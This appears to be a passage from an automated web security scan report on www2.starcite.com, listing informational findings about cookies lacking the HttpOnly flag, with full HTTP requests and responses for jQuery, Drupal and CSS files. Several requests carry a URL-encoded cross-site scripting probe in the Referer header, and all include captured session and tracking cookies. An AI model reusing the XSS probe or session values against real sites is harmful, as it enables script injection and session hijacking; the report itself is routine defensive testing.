Path:   /starcite/misc/jquery/jquery-1.2.6.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery-1.2.6.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Fri, 08 Aug 2008 20:00:00 GMT
ETag: "10000000025a0-18764-453f84024f000"
Accept-Ranges: bytes
Content-Length: 100196
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

(function(){
/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Da
...[SNIP]...

2.42. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.cookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery.cookie.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 29 May 2008 15:50:25 GMT
ETag: "100000000259c-1096-44e607cd4f240"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...

2.43. http://www2.starcite.com/starcite/misc/jquery/jquery.validate.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.validate.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery.validate.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 07 Aug 2008 20:17:42 GMT
ETag: "100000000259f-8c32-453e4619a6580"
Accept-Ranges: bytes
Content-Length: 35890
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/*
* jQuery validation plug-in 1.4
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2008 Jörn Zaeffe
...[SNIP]...

2.44. http://www2.starcite.com/starcite/misc/jquery_new.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery_new.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery_new.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Tue, 02 Feb 2010 20:23:27 GMT
ETag: "1000000003159-114bb-47ea3dfd6adc0"
Accept-Ranges: bytes
Content-Length: 70843
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:38 GMT;path=/

/*!
* jQuery JavaScript Library v1.4.1
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

2.45. http://www2.starcite.com/starcite/misc/reset.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/reset.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:49 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.46. http://www2.starcite.com/starcite/modules/Suppliers_howitworks/howitworks.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/Suppliers_howitworks/howitworks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/Suppliers_howitworks/howitworks.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 17:38:00 GMT
ETag: "100000000296a-2cc-4558899238e00"
Accept-Ranges: bytes
Content-Length: 716
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function Suppliers_howitworks_form_validation(){
   var leftside_title    = document.getElementById('leftside_title').value;
   var middle_title    = document.getElementById('middle_title').value;
   var right
...[SNIP]...

2.47. http://www2.starcite.com/starcite/modules/addregions/addregions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/addregions/addregions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/addregions/addregions.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Tue, 04 Nov 2008 13:42:35 GMT
ETag: "10000000025ac-4f8-45add3c72ee83"
Accept-Ranges: bytes
Content-Length: 1272
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

function trim(str)
{
   return str.replace(/^\s*|\s*$/g,"");
}
function addregions_form_validation(){
   var country    = document.getElementById('name1').value;
   var region = document.getElementById('
...[SNIP]...

2.48. http://www2.starcite.com/starcite/modules/cck/content.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/cck/content.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/cck/content.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Fri, 10 Aug 2007 07:38:00 GMT
ETag: "10000000025ca-170-43753744f2600"
Accept-Ranges: bytes
Content-Length: 368
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/* $Id: content.css,v 1.2.2.8 2007/08/09 19:08:16 yched Exp $ */

.field .field-label,
.field .field-label-inline,
.field .field-label-inline-first {
font-weight:bold;
}

.field .field-label-inline,
...[SNIP]...

2.49. http://www2.starcite.com/starcite/modules/cck/fieldgroup.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/cck/fieldgroup.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/cck/fieldgroup.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Fri, 09 Feb 2007 02:35:00 GMT
ETag: "10000000025d7-59-4290201941d00"
Accept-Ranges: bytes
Content-Length: 89
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

div.fieldgroup {
margin:.5em 0 1em 0;
}
div.fieldgroup .content {
padding-left:1em;
}

2.50. http://www2.starcite.com/starcite/modules/date/date.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "100000000263e-793-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 1939
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

.container-inline-date {
width:auto;
clear:both;
padding:0;
display: inline-block;
vertical-align:top;
margin-right: 0.5em;
}

.container-inline-date .form-item {
float:none;
padding:
...[SNIP]...

2.51. http://www2.starcite.com/starcite/modules/date/date_popup/themes/timeentry.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_popup/themes/timeentry.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_popup/themes/timeentry.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "1000000002670-1f6-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 502
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/* timeEntry styles */
.timeEntry_control {
   vertical-align: middle;
   margin-left: 2px;
}
* html .timeEntry_control { /* IE only */
   margin-top: -4px;
}
/* Make sure background colors from other style
...[SNIP]...

2.52. http://www2.starcite.com/starcite/modules/date/date_popup/themes/white.calendar.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_popup/themes/white.calendar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_popup/themes/white.calendar.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "1000000002671-e16-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 3606
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

** Reset link properties and then override them with !important */
#calendar_div a, .calendar_inline a {
   cursor: pointer;
   margin: 0;
   padding: 0;
   background-color: #fff;
   color: #000;
}

/* Main St
...[SNIP]...

2.53. http://www2.starcite.com/starcite/modules/date/date_timezone/date_timezone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_timezone/date_timezone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_timezone/date_timezone.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "100000000267b-7cc-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 1996
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: date_timezone.js,v 1.1.2.3 2008/06/20 12:26:06 karens Exp $
/**
* Set the client's system time zone as default values of form fields.
*/
Drupal.setDefaultTimezone = function() {
var dateSt
...[SNIP]...

2.54. http://www2.starcite.com/starcite/modules/jstools/jquery.history_remote.pack.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/jquery.history_remote.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/jquery.history_remote.pack.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 30 Nov 2007 10:35:00 GMT
ETag: "100000000273c-a22-44022fb897d00"
Accept-Ranges: bytes
Content-Length: 2594
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

/**
* History/Remote - jQuery plugin for enabling history support and bookmarking
* @requires jQuery v1.0.3
*
* http://stilbuero.de/jquery/history/
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.
...[SNIP]...

2.55. http://www2.starcite.com/starcite/modules/jstools/jstools.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/jstools.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/jstools.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Thu, 09 Aug 2007 09:56:00 GMT
ETag: "100000000273f-1914-4374143fe8c00"
Accept-Ranges: bytes
Content-Length: 6420
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: jstools.js,v 1.9.2.8 2007/08/08 21:26:07 nedjo Exp $

Drupal.behaviors = Drupal.behaviors || {};

/**
* Attach registered behaviors.
*/
Drupal.attachBehaviors = function(context) {
context
...[SNIP]...

2.56. http://www2.starcite.com/starcite/modules/jstools/tabs/drupal-tabs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/drupal-tabs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/drupal-tabs.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 16:26:47 GMT
ETag: "10000000027d2-251-466a903e4fd1e"
Accept-Ranges: bytes
Content-Length: 593
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

html.js div.drupal-tabs {
display: none;
}
html.js h2.drupal-tabs-title {
display: none;
}
.tabs-nav-previous, .tabs-nav-next {
font-size: 12px;
font-weight: bold;
float: left;
b
...[SNIP]...

2.57. http://www2.starcite.com/starcite/modules/jstools/tabs/jquery.tabs.pack.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/jquery.tabs.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/jquery.tabs.pack.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 09 Feb 2007 15:45:00 GMT
ETag: "10000000027d4-128d-4290d0ad6b700"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/javascript
